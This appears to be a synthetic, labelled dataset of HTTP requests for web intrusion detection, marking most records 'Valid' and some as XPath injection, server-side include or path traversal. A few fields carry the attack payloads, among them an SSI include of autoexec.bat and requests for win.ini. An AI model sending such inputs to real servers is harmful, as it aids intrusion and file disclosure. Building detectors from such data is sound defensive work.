GET /nyhkrvkiunmrnYi/com/99z/s1iisel8er/staessihsth/6xmlPAfNP@fMGdM/oV/Zghi4_IYrmH-y9k.js?1lEhocwHana=efH&NdelSotos4re0=%27cee&A0t5s=604118&0b6ohtpassdeleteusrTHKadmin=hMhAnAYzNJiL&osflmn2lseaie=0eetn2hgh&Touioecrr=83497618 HTTP/1.1
Host: 197.144.167.131
Connection: dv2nmer
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: hd-aHu3d, treIeda-dn;q=0.2
Cache-Control: no-cache
Client-ip: 79.76.165.215
Cookie: in=rytgroup bye;eoDUgo6=93736;ce=ystCt
Cookie2: $Version="17"
Date: Sun, 25 Apr 04 14:31:46 CET
ETag: "gwWlvqw-Hsu3xuRd"
Expect: 100-continue
From: arin@CIbt.st
If-Modified-Since: Wed, 21 Oct 09 18:47:59 UTC
If-Unmodified-Since: Thu, 17 Sep 09 18:12:38 CET
If-Match: *
If-None-Match: "PxGn6cfL9v6oB4lW48o"
If-Range: *
Max-Forwards: 6
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM YVRzb3BlZ2lBc2hhb3Rwb3JwZ2hpZTNzQW5wQWg0b25kV3NpdmlleWRl
Authorization: NTLM TnNIZ3J0ZWthb0VUMnQ0bmJzaGtubmFvTm02Tm5TZWM4bzhlRXNwY3Rkbw==
Range: 3666-92,-7
Referer: http://ele9dji.uk/s7rWqxP/uFaoe.zip
TE: trailers,chunked
Trailer: Connection
User-Agent: Mozilla/5.3 (X11; U; Linux i586 5.6; bd-in; rv:4.6.0) Gecko/82669512
UA-CPU: StrongARM
UA-Disp: 1867,055,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 2031x847
Via: 9.2 www.Aolf.gif, 7.6 199.193.39.146, 7.0 www.i4Wiv.tiff:71430
Transfer-Encoding: tehgt
Upgrade: emf/6.5
Warning: 278 89.82.235.229 "a0hcdrrhmaORaahd67Hi" 
X-Forwarded-For: 165.100.124.216
X-Serial-Number: 84453733272881684848
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19628
Start - Id: 8015
class: Valid
PUT /nvxe9guqzohsen4so6cD/dNirs1isssomnTja/processing-instructionncpMcmdIaz_BR/ms@wYhOBpyYO_cH_G.Qr/e_/zene9/ifmuMvb3xS/reG.KNIqqke1mluEGC3R/r78VuH.rvmcOEemfsYj/oemse/wT0/Ay6u.png? HTTP/1.0
Content-Length: 242
Content-Language: pshi
Content-Encoding: compress
Content-Location: /dhirpnr/4eni/tazcKe5.asmx
Content-MD5: bGVrZXJhZWhvcHRpQWV5Tw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 13 Aug 08 13:29:49 UTC
Last-Modified: Sat, 06 Nov 04 19:17:23 GMT
Host: 157.89.201.180
Connection: urhDuL5s
Accept: application/x-tar, video/*, video/quicktime;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-transform
Client-ip: 133.145.210.81
Cookie: oknuyThyl=lf.xhW;mfsr5moScntnstD=rEetolds
Cookie2: $Version="60"
Date: Wed, 09 Dec 09 14:11:40 UTC
ETag: W/"sqtoP@fMqGln3Ej4PBS"
Expect: oae6ais
From: itepe@sh8wbe.it
If-Modified-Since: Sun, 11 Apr 10 16:59:19 GMT
If-Unmodified-Since: Sat, 24 Mar 07 15:46:12 CET
If-Match: "EFRmo7naAewuzWGgB"
If-None-Match: "8Dnn@fuiQMzjJjH"
If-Range: Sun, 06 Sep 09 21:31:20 UTC
Max-Forwards: 05
MIME-Version: 6.1
Pragma: ttsiiyb=rtlnq
Proxy-Authorization: NTLM dGFUaW9pMDRlbm9vYWt0YWVyc2x0YXNzdnV1ZTZpcnR0
Authorization: Basic YnRtaTM6QTlkaWd6
Range: 439-82,94-,67-
Referer: http://ettcnosi.biz/7rEer.mspx
TE: deflate,trailers
Trailer: Accept
User-Agent: Mozilla/6.1 (Machintosh; U; PPC Mac OS X 8.5; i7-ra; rv:3.7.4) Gecko/50277318
UA-CPU: x86
UA-Disp: 7482,985,32
UA-OS: Linux
UA-Color: color8
Via: 7.2 229.185.253.138, HTTP/4.4 www.nare.css, 8.5 www.8hArz.tiff
Transfer-Encoding: identity
Upgrade: tOtx/4.6, hie/5.3
Warning: 932 www.eNngulE5.htm:42895 "m0dW" 
X-Forwarded-For: 243.241.144.79
X-Serial-Number: 6980972846
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~

TaN=Ooc&e3qss2h=20632&trtnpeew=8465747847&oUyDvarVnFR=tsesonaErj4iiin5&arUn=qJdjnz&wAtm9lwyCti=2586222393&hNbteUy3ufIr=|bihylyeido&9ut=8&hudsl=426&rranc=mopenOks&wQuI666e=rRk&t2O6dVp.JQFV=14866692&Caece2eceal=15495&enue=hnn seenjbxmlmocha0r

End - Id: 8015
Start - Id: 15852
class: Valid
GET /fxelI/ts5/on9ljeKamatYte/erYo/waTnOnlo/ht/0madkin7d3sSeduh.js?UEAe=ewd%27j7&fDHas=865Z%402V&e4tNefaorarha=+5gSi HTTP/1.0
Host: 128.110.254.189
Connection: close
Accept: video/*;q=0.1, video/*;q=0.4, audio/x-wav;q=0.8
Accept-Charset: koi8;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: max-stale=15487
Client-ip: 127.204.91.129
Cookie: Ld=dLS_Jw;urnKsdKhaeynes=aGd@ioC@;5sice8=14206613;eherziieacuK=edr;sgse9=o;gdattYp=e7mQ2J1
Cookie2: $Version="648"
Date: Mon, 26 Apr 10 12:08:30 UTC
ETag: "Lgka-Qg8YEq22Z3L"
Expect: 100-continue
From: tir8j@ttaaerhreh.com
If-Modified-Since: Fri, 20 Nov 09 08:48:18 UTC
If-Unmodified-Since: Sat, 01 Sep 07 17:54:02 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 08 Jun 05 02:47:26 CET
Max-Forwards: 0033
MIME-Version: 3.5
Pragma: 8Tk=rg4h
Proxy-Authorization: Digest nc=6CeB3cE8
Authorization: Digest username="Pego"
Range: -630,9-,363-
Referer: /mles/rb3mtNs/eHlee/ybgmf/hal2faoe.tiff
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: ouwbk6y2uD/3.4.1.1.0
UA-CPU: MIPS
UA-Disp: 318,100,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 265x821
Via: 3.3 9.63.20.40:5, HTTP/5.6 200.7.184.148, 6.0 www.Uhenii.jpeg
Transfer-Encoding: identity
Upgrade: 1eae/0.8, q1he/7.5, itp/8.5, entee/9.7, Eq78/3.4
Warning: 734 www.a4hol.gif "8eiyls3tra8i3ro" "Sun, 10 Sep 06 06:04:47 CET"
X-Forwarded-For: 157.1.233.188
X-Serial-Number: 6066558353005235
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15852
Start - Id: 1352
class: Valid
GET /mutiolltebiwvnetphlF/UctislleaIm/travqJL7JevA6pzM/jr2/yg8IKRfn3maenM5Rn/t8QsDXZ.7huTzti5F9/tfosGNZKpL8engaS9F-/db.L0P_z2-JgNyE9_afw.htm?XUXQUbsfromSA3=slds4Onea HTTP/1.0
Host: 43.233.161.108:80
Connection: deayoah
Accept: audio/*;q=0.8, application/*
Accept-Charset: iso-8859-4;q=0.1, windows-1250, iso-8859-15, x-mac-korean;q=0.6
Accept-Encoding: 
Accept-Language: f-r;q=0.4
Cache-Control: min-fresh=23
Client-ip: 71.250.186.224
Cookie: enat1re=eui8o;3as0tomovnin=like0mtjo)lbrMftetboot.iniyhri;nH4ey=i@]processing-instruction? lgeorb?
Cookie2: $Version="315"
Date: Thu, 12 Oct 06 02:06:21 GMT
ETag: "WiopCSRqh9ng4.5Y"
Expect: rajicDn
From: wi2twwpe@rrmwot4.ch
If-Modified-Since: Fri, 30 Jan 09 08:36:31 GMT
If-Unmodified-Since: Sun, 26 Aug 07 05:11:36 UTC
If-Match: *
If-None-Match: "zCIJ-mk0i-hliicT"
If-Range: "765jzxf0UNIMHSwdWA9"
Max-Forwards: 560
MIME-Version: 3.4
Pragma: eg7pudh='pbv'
Proxy-Authorization: baAnw tvhn0r=TIoqsy
Authorization: Basic YWtld3B1YWk6dHNlYQ==
Range: 518-86,86-,865-
Referer: /rflbni/sfnonSlf.swf
TE: deflate,chunked;q=0.5
Trailer: If-None-Match
User-Agent: Mozilla/1.8 (compatible; AoitU; Mac OS X; 6eit; aEysbt; r2see)
UA-CPU: Sparc
UA-Disp: 0720,076,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 290x591
Via: FTP/6.7 www.aopsa.htm, FTP/0.5 www.ue35.css:256, FTP/0.8 171.228.40.72
Transfer-Encoding: deflate
Upgrade: yans3i/2.5
Warning: 525 2.204.107.239 "ls4rn" 
X-Forwarded-For: 185.64.155.53
X-Serial-Number: 814700
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1352
Start - Id: 34342
class: Valid
POST /0iu/o@4Cxz9DOO0/rJoVi8fAGdJmse/e6upAb1R/ef@xEKf/rHjmxVn.mdb? HTTP/1.0
Content-Length: 181
Content-Language: ieq5smh5
Content-Encoding: deflate
Content-Location: /swtrn/flihaiot/iheelc.doc
Content-MD5: dHIwc0Vsbm5peGV0cnJRNA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Aug 05 14:44:33 CET
Last-Modified: Wed, 13 Apr 05 02:25:54 CET
Host: www.teaC90cOoi.de
Connection: ontwwu
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=1599
Client-ip: 165.247.4.121
Cookie: faz=0;dlsrehjeads=regedusOohdm6;ac5mf=627404;j@SN8s73_LM=3;stiah=eee
Cookie2: $Version="08"
Date: Fri, 06 Mar 09 24:34:54 CET
ETag: "Jhi0.WHrMahIITB"
Expect: 100-continue
From: 8Tmtnybi@toleu.gov
If-Modified-Since: Sun, 17 Sep 06 17:24:03 CET
If-Unmodified-Since: Tue, 19 Dec 06 07:54:51 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 09 Feb 10 08:51:01 GMT
Max-Forwards: 2389
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: oestsu 7adOioc=p8h4eI5
Authorization: Basic bmcyZXFmbjo0YVRsZWU4
Range: -3120,383963-2,8-2211
Referer: http://www.bylx5.biz/iyncateg/nbtdeAnn/betyo/neopn8/se8ns.cfm
TE: trailers,trailers
Trailer: Authorization
User-Agent: lMceEf
UA-CPU: Sparc
UA-Disp: 3186,9762,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 9714x0556
Via: 1.4 224.64.242.199
Transfer-Encoding: ifrovU
Upgrade: rdr/6.4, 3nxf/4.2, 62a3t/9.7, gmOIe/2.2, sz3/4.6
Warning: 784 www.qelosv.tiff "satlme3dro" 
X-Forwarded-For: 143.200.9.7
X-Serial-Number: 46710
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iwohtnowseeyoia=09&SZcqne8d=76556&Twte=neD &ovtrIitlco=rnnag&uk8jsr=e &zigidiexwttuh=b4Tvsru8r&mpb5esapnbntaoe=eaveccd&drnb=te;8between&6tatkotwhry=dofoe&sa3tssutsczogi=tslt3muenr

End - Id: 34342
Start - Id: 27095
class: Valid
GET /cT/zhnhortteoin/oram/dj6L/nsienr/1vnaeg2i4tA9hetme/yninoes81r725Itmi.shtml?lt=683290&ieece7roozto=itsorn3position&4YnodebhttpsMPadmin=window.open5openoean%5Bo8&detsttOo=atanodIeeleovkrq&cenmg=wohlbosa&earNRpthB76uh=8122438&3n=sjvv7Cm&IGH-i3Ubd.=eaoVr1qztt&airCodb7iehtno=37711975&yo6mtkhE=optae&ys0xte=ebs&No=ho%7Cssosteqxltd3&OOftglehPeT4h=3998111 HTTP/1.0
Host: www.tfsts.de:80
Connection: ogeDrK
Accept: application/postscript;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: reesur-lt;q=0.4, aE-miqrho4
Cache-Control: max-stale=7375
Client-ip: 245.244.167.176
Cookie: xoamrje3anbIs=o8H;eSvlbesal7rpd=8540;aq=lenull;VE3Q8allEv=4;hskeintRmlea=96;UPtnphp=romdb4rnshitoqo
Cookie2: $Version="69"
Date: Fri, 07 Mar 08 19:22:04 CET
ETag: W/"-K_I8KcrnHjO1jBPvpv"
Expect: 1tohn=atre;ynrrcan=2jQor
From: hhafeiO@hshvl.net
If-Modified-Since: Thu, 25 Jun 09 21:47:42 CET
If-Unmodified-Since: Wed, 10 Feb 10 17:41:59 CET
If-Match: *
If-None-Match: "kT7LzVEXA1pOSMS5H8y"
If-Range: *
Max-Forwards: 096
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Digest nc=bF23b1eD
Authorization: NTLM NG5ibnN1d25sYVRic0VzaGFUc3hhNjE5dU8zdGFldHNmYQ==
Range: 22-,0045-2456,-6
Referer: /imagjc5/tposh/gks6/tinpSeg.jpeg
TE: trailers,trailers,chunked;q=0.7
Trailer: Expect
User-Agent: al4hscr7e/9.2.1
UA-CPU: Sparc
UA-Disp: 3070,8448,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 1019x630
Via: FTP/2.9 87.140.229.57:36568, 2.6 152.116.105.4, HTTP/0.3 123.2.241.209
Transfer-Encoding: compress
Upgrade: tii/2.0, axpd/5.6, taa/0.9
Warning: 449 www.kiaeed.tiff "omehrrrangjiAinemo" "Sat, 24 Apr 10 07:58:27 UTC"
X-Forwarded-For: 38.254.21.15
X-Serial-Number: 0883782422223319
----: -------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 27095
Start - Id: 48553
class: XPathInjection
PUT /3cat56p1pOopt1elsUV/_3e1NJSR4Dimg/s2KT23CXqc-yTo1_9626.shtml? HTTP/1.0
Content-Length: 245
Content-Language: eQbtepe,r0,it5op7tn
Content-Encoding: identity
Content-Location: /b8OTd/mlh0ieG/e3aS/DauWe.html
Content-MD5: YW9lblBPbnIzdW9lbnNyaA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Feb 06 18:27:43 CET
Last-Modified: Sat, 30 Apr 05 24:25:06 GMT
Host: 139.36.80.58
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: shift_jis
Accept-Encoding: compress;q=0.5, compress;q=0.2, identity;q=0.1, deflate, gzip
Accept-Language: b-rCIs, veHeet-ut, n-nfGo9
Cache-Control: min-fresh=87
Client-ip: 1.24.145.159
Cookie: OntOpeu=8708;uneBdhly=58167504;ioomrzrs8=977421;qvOuuj4Eag1lne=0t sOtaoopene&t;
Cookie2: $Version="8"
Date: Wed, 20 Jun 07 16:55:34 CET
ETag: W/"9a.@kRmZK0277p2HO0wo"
Expect: 100-continue
From: 5lotN@aerqwne.st
If-Modified-Since: Thu, 03 Jul 08 24:41:32 CET
If-Unmodified-Since: Fri, 27 Feb 04 02:00:01 CET
If-Match: "GvhUGbSDmQ1Xtoz"
If-None-Match: *
If-Range: Sun, 01 Jul 07 11:02:42 UTC
Max-Forwards: 5
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM MXRlNHVscmduc2V3eDZybW10MmxjbmVlZ3QxdGVzcGF0ZQ==
Authorization: NTLM cm1zbFN2OW5hdHlkYmhmb0xrZ1lpRTRhb3F0c3B5ZFNob2UybQ==
Range: 31644-283996
Referer: /rvizs/10lprn/ntqi/wbao/aoeh9e8.wmn
TE: gzip,gzip;q=0.1,gzip
Trailer: Via
User-Agent: natheettso/1.8
UA-CPU: StrongARM
UA-Disp: 8923,087,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 429x1759
Via: HTTP/5.0 204.218.167.176, 6.3 www.ig96red.tiff, 3.8 www.lesWj.js
Transfer-Encoding: compress
Upgrade: lexe/0.2, mX4rfi/5.5, ue5de/1.9
Warning: 856 94.254.67.38:3919 "jmu0gstq2hrnv" 
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 63432598525498098
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

vuUYs=eKiNh&1SP=tl&iXlTeohDniahcd=nYk2pjTerz&ul=t2reyehat&eetSsfdthtiz=sSoi3sAtleahp&2ciNjB6Gjrm=bt+d0e2e&mp=snr&o4h=iqcin3tuhs&5klesao=389470323&1ndohOhll=6  or    o/D2w/eae/child::node()[position()=859]     or 7371=

End - Id: 48553
Start - Id: 28030
class: Valid
GET /nLrAGi/s9KJTN4WMDwgF94A/etJ4dAjoq5YG67n.mspx?9ieissvnh=7870057154&BMdH.bbdHR5=t672&nenecetE=qdr&ee6aqa05m=enmo HTTP/1.1
Host: www.eoaes.biz
Connection: lbsysmea
Accept: */*;q=0.6
Accept-Charset: iso-8859-2;q=0.7, windows-1253, iso-8859-5;q=0.0
Accept-Encoding: compress
Accept-Language: *
Cache-Control: no-cache
Client-ip: 182.13.119.228
Cookie: hti4bsiuaoxnalj=4;teuknedh4=ft
Cookie2: $Version="9"
Date: Mon, 07 Jul 08 10:53:59 CET
ETag: W/"C5s5DELR3662.cu_7@"
Expect: Nhgte=rocNr
From: gu9cDaia@ar6it9.st
If-Modified-Since: Mon, 18 Feb 08 15:24:45 CET
If-Unmodified-Since: Wed, 12 Jan 05 08:04:09 GMT
If-Match: "EQc.f--8PhvF2.fJ"
If-None-Match: "PGS@WStBJnaYtWzHqPBD"
If-Range: "bTFa3tJE.gWsfugB8"
Max-Forwards: 4
MIME-Version: 8.8
Pragma: Ensl=auztg
Proxy-Authorization: NTLM QTRjYWFhd3RhNHlnT2l0aWNvaWkxc3JoVG9ndGFhaWRscjhySGF0aG90
Authorization: NTLM cjJyTnBzbXVyZUFsbVRvZXRjYm9hb2E0bmllYjVqNGU=
Range: 96520-952
Referer: http://seek7ed.org/6rnStToe/sle2w/eoiyndwl/gh5nn.sh
TE: trailers
Trailer: If-Range
User-Agent: uJf-8ZiBW http://www.sqnoa8ot.uk
UA-CPU: PowerPC
UA-Disp: 6297,097,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4477x7117
Via: HTTP/4.1 203.51.30.203
Transfer-Encoding: 5wCH; gWhi0=EsfaEree
Upgrade: 9htud/6.5, uadanh/4.9, euxd/5.9
Warning: 759 www.rcgyueh.tiff:5 "wolidasoknadsaeahf" "Sun, 27 Jul 08 14:28:37 UTC"
X-Forwarded-For: 140.27.28.161
X-Serial-Number: 45504056220
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28030
Start - Id: 40356
class: SSI
GET /njP/e2Giha/sOse2ra2eseeo/1tnnab/b9X/DsperlCzL/mI1aT@P@KGAwME2.v-/AeAahypettd/hR/0osprc/passthruStqR.tiff?to=s2sr2em2c+inullote%26g%3Cwhere%3B&yn=e8RT.W10ay&ondansuo5tyNwz=62&srvUvar=woohaNhror9ovn&st=61139&ripOaieih5ai=6521&rlixn1nV=0u HTTP/1.0
Host: 153.123.46.252:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: <!--  #include  virtual="d:\windows\autoexec.bat"   -->
Cache-Control: max-stale=8
Client-ip: 225.218.231.89
Cookie: aeiazuawttsze=143;qsthje=u
Cookie2: $Version="388"
Date: Fri, 21 Apr 06 11:59:47 CET
ETag: "hhpxoGh-twplE@7JJte"
Expect: 6tot=dpitp
If-Modified-Since: Wed, 05 Mar 08 17:10:54 UTC
If-Unmodified-Since: Sat, 19 Apr 08 14:05:57 UTC
If-Match: *
If-None-Match: "diB6RirOE2MAhfRRsC-D"
If-Range: Sat, 16 Jul 05 22:05:14 GMT
Max-Forwards: 0665
Authorization: Basic bGFndWFyaTphNmlkbmlp
Range: -62942,193769-
Referer: /rauavhe/aspEaqre/t1otpgd/7rxkns.cgi
TE: chunked;q=0.5
User-Agent: ti.l8vaa4p http://www.hmncxr.net
UA-Pixels: 7186x8117
Via: FTP/7.8 www.mtghtgCr.js:069, 1.4 202.130.188.40, tvhoa/5.5 www.S60eWx.gif:92072
Transfer-Encoding: compress
Upgrade: fwr/8.8, o6abt/9.6
Warning: 603 209.229.202.179:95978 "oe2n7zpejaLsese" "Thu, 17 May 07 21:39:03 GMT"
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40356
Start - Id: 3563
class: Valid
GET /edNw9U7w@KrEVGAIKQ3/nDO-3ObP/tdWsatsefn7ll6b3eIw/si9B/w8NPTTpXt/InwO8Ao/tan/qjCtKnnc4i9asxao.php4? HTTP/1.1
Host: 246.239.18.129
Connection: ou7naet
Accept: text/*;q=0.8, audio/basic, video/*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: wnulsnla-evht, ua-plEwif0;q=0.0, VM8-k9r7nieh;q=0.7, dhn-ogfEshF, lv-es0s
Cache-Control: no-store
Client-ip: 10.4.122.248
Cookie: rvetAk04tlb=458
Cookie2: $Version="626"
Date: Sun, 11 May 08 18:12:15 CET
ETag: W/"RqOfUIrMkFeqervFbqid"
Expect: sawmtrQV
From: yHte1@lubebreIb.biz
If-Modified-Since: Mon, 14 Mar 05 19:49:13 UTC
If-Unmodified-Since: Thu, 21 Jan 10 14:38:57 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7346
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Basic b291ZGFvOjRFcmgzdGU=
Authorization: Basic ZW0yYW5lOmlhNWlmcHlp
Range: 285-321592,-0,1-98
Referer: http://www.smihlkb.com/enh5E/alseorrc/kadouas/Fnorm9ar.mp3
TE: trailers,chunked
Trailer: Accept-Language
User-Agent: Mozilla/0.6 (Machintosh; U; PPC 1.1; ae-oa; rv:2.4.6) Gecko/31421236
UA-CPU: MIPS
UA-Disp: 754,026,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 047x6463
Via: 1.2 www.hmkp9n.js
Transfer-Encoding: compress
Upgrade: h7ie/3.3, LnC/5.0, hAteV/9.3, nrgX/0.9, 4yoeea/8.1
Warning: 502 www.deutlFai.htm "sdoAadanidclexcd" "Sun, 24 Jan 10 15:55:45 CET"
X-Forwarded-For: 36.67.190.24
X-Serial-Number: 399935744
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3563
Start - Id: 45844
class: PathTransversal
GET /o4of6t/Gyeeheeseilwvdscsi/szI@oVuD0.mspx?r43b=e4-6ja_9TQw.&AroonWc=d+tsklseq9heoW&cqIsidFw=ydnmBf&tp4nhtlf=o%3A%5C%5CWINNT%5C%5Cwin.ini&1igfzt5eNt=%5Dperl%5Drr&DiR7nTl=rg1&p_bLfSaK=%2F%5Dt9&rpaltgo6hajCg2e=189&qro=7881820330 HTTP/1.0
Host: 175.236.105.197
Connection: keep-alive
Accept: text/*;q=0.9, application/x-tar;q=0.3, text/*;q=0.2
Accept-Charset: euc-kr;q=0.5, windows-1251;q=0.0, gb2312, euc-tw
Accept-Encoding: compress;q=0.4, identity;q=0.5
Accept-Language: *
Cache-Control: max-age=1
Client-ip: 145.76.47.201
Cookie: ryft=ishismd;ne=tGeiih;hsxra=mN$tmpdvRy1yttcatR ods;eLh092JEwC=2te;6tltt= go;eOlnit=5534685
Cookie2: $Version="59"
Date: Wed, 27 Oct 04 09:34:12 CET
ETag: W/"o390xV4dGEep.dZG1C"
Expect: crmd2me
From: ix4abcph@mnt9ssu.gov
If-Modified-Since: Mon, 21 Aug 06 12:44:36 GMT
If-Unmodified-Since: Thu, 27 Jul 06 01:27:02 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 02 Jun 06 09:42:31 GMT
Max-Forwards: 685
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: Digest username="EStrcbe"
Range: 248-
Referer: http://q7lonit.ch/zeeeAoqr/weestao/loRr.conf
TE: trailers,deflate;q=0.7,deflate;q=0.8
Trailer: Transfer-Encoding
User-Agent: sn3rnar0mI/8.9.9.5
UA-CPU: Sparc
UA-Disp: 7854,570,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 271x8605
Via: FTP/7.6 www.eiohilm.jpeg, FTP/5.3 147.230.170.29
Transfer-Encoding: compress
Upgrade: inw5/1.5, wwesr/8.9, 5rte/1.6, d8hhli/8.3
Warning: 146 143.244.193.232 "tjezxosaoyuieeityv" 
X-Serial-Number: 25397478987579
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45844
Start - Id: 7762
class: Valid
PUT /dstot/oqenJqmna6c9tnI/ns/M0window.open63N_/hNfY@q52z3.tiff? HTTP/1.1
Content-Length: 268
Content-Language: 6np
Content-Encoding: deflate
Content-Location: /eoos/strp.cfm
Content-MD5: VnJkbDdsMnVpeWxucFNjbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 10 Feb 07 24:00:43 GMT
Last-Modified: Sun, 03 May 09 07:27:17 CET
Host: www.asrhodew.be
Connection: close
Accept: */*;q=0.9
Accept-Charset: iso-8859-6;q=0.4, euc-kr;q=0.1, iso-8859-3;q=0.4
Accept-Encoding: gzip, identity;q=0.9, identity;q=0.2, deflate;q=0.8, compress;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 200.184.5.24
Cookie: EvreaIolveihW=1595937115;einhe6yn=267
Cookie2: $Version="143"
Date: Sun, 18 Mar 07 04:00:55 UTC
ETag: W/"8RQB1Qe.P@oXtZte.vHq"
Expect: hfthel=r3nclwo;Iululai=lIlcohii
From: aueghrP@epx9atfOth.fr
If-Modified-Since: Fri, 29 Jan 10 01:04:18 UTC
If-Unmodified-Since: Sat, 21 Jul 07 02:42:23 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 26 Feb 06 17:14:35 UTC
Max-Forwards: 8
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic bm50aXRjcjpzbzhs
Authorization: hoahn mcesh=etio2
Range: 42-,574-0,04-96557
Referer: /ao96Dru.wav
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/0.3 (X11; U; Open BSD i586 3.9; eC-nt; rv:1.0.8) Gecko/28771708
UA-CPU: x86
UA-Disp: 968,7728,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2784x639
Via: 5.3 210.194.117.123:53375, 5.0 www.hiote5ri.jpeg, 2.2 www.an8O.shtml
Transfer-Encoding: identity
Upgrade: hen/2.3, tkocy/8.4, cNad/2.7, rStxee/8.1
Warning: 810 141.222.234.142 "zmnweaewonEakBetbj" "Sat, 23 Jan 10 20:21:52 CET"
X-Forwarded-For: 246.243.72.110
X-Serial-Number: 575735447
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

opdExf=twhs&taheidgtCe=s17ceTaeeifgn37e&gsMoformOvBDselect=qthouor5aneetusls&TinetAtno=91&5ngs4=8tsnloxoic3aeb&nnoede=d4alltedpmails8&LT2lMBhAagywindow.open=tl&gwy59stF=515&nfrpuSvmad= eu$t&owb6eoese=systemktwUA&9o=hie0f6eitheaainpm&ignttl=22382388&seh9sm4ezs=divnna

End - Id: 7762
Start - Id: 44841
class: PathTransversal
GET /aszneleva/pjLg.njNO7/x5HZXZ5TJUY6f/nXml1nr.hs/c28kmdD0LjhHR.qMZYrJ/eegnlwsdieteomjdtcu/8daik/e4d/sea4is5feejiaartTl/RgzJB8/Gq.exe?@EidA=683&a2uhoabsa2o=file%3A%2F%2F%2Fe%3A%2FoyYh7%2Flo%2F3la.xml&ntweh=eO0wjm&ebo1e=fw1&rcOfk=ngjGkfB9osJa&sn=aVfZrKoFU&AihTuogdsirfs=usr3dh&rasgbo=1&d24mrd=42&tcn=45323&onoNi=dPke HTTP/1.1
Host: 107.54.50.191
Connection: close
Accept: audio/x-wav
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.2, compress, deflate
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 55.4.250.85
Cookie: fOlinkWG3meta6Y= uutnn;qtG6Br4nQ7M9=22M8_p9oUl
Cookie2: $Version="393"
Date: Sun, 27 Jun 04 17:33:53 CET
ETag: W/"1jGtoTUskEbXDpBL"
Expect: 100-continue
From: eosehi@IsoiaSe.uk
If-Modified-Since: Fri, 03 Sep 04 05:55:58 CET
If-Unmodified-Since: Fri, 09 Feb 07 13:02:29 UTC
If-Match: "_F5cy_Ape-PYI7E2EApc"
If-None-Match: "8spgIl6Vt8rYwmzm"
If-Range: Sun, 17 Apr 05 14:17:59 CET
Max-Forwards: 2
MIME-Version: 8.7
Pragma: N='eoa'
Proxy-Authorization: Basic bTNkZHI6aHRlcm9l
Authorization: Basic cmNkYzoydGFjb2V0
Range: 4-,8-56742
Referer: /ate8lae7/vliosvhe.bin
TE: chunked,trailers,chunked;q=0.3
Trailer: From
User-Agent: Mozilla/5.1 (compatible; an2r83l; Unix; Exms2iNie; cr0a0nin; eeaIi)
UA-CPU: MIPS
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 035x248
Via: 2.5 127.214.120.94
Transfer-Encoding: deflate
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 218 47.103.166.198 "iok3ehde4ryOr" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 083276
----: ------------
